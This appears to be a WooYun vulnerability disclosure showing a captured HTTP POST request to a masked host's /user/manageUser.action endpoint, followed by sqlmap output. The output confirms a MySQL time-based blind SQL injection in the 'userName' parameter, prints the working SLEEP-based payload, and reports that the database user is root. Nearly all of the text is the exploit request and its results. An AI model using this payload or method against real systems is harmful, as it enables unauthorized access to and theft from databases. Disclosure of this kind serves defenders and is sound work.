WooYun.org

**.**.**.**/user/manageUser.action

POST /user/manageUser.action HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: **.**.**.**/user/manageUser.action
Cookie: xxxxxxxxxxxxx
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 40
userName=admin&deviceName=a&serialNo=ddd

it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
[19:09:39] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[19:09:39] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[19:09:42] [INFO] checking if the injection point on POST parameter 'userName' is a false positive
POST parameter 'userName' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 104 HTTP(s) requests:
---
Parameter: userName (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: userName=admin' AND (SELECT * FROM (SELECT(SLEEP(5)))xMNd) AND 'qYeQ'='qYeQ&deviceName=a&serialNo=ddd
---

web application technology: Apache 2.0.64
back-end DBMS: MySQL 5.0.12

current user:    'root@localhost'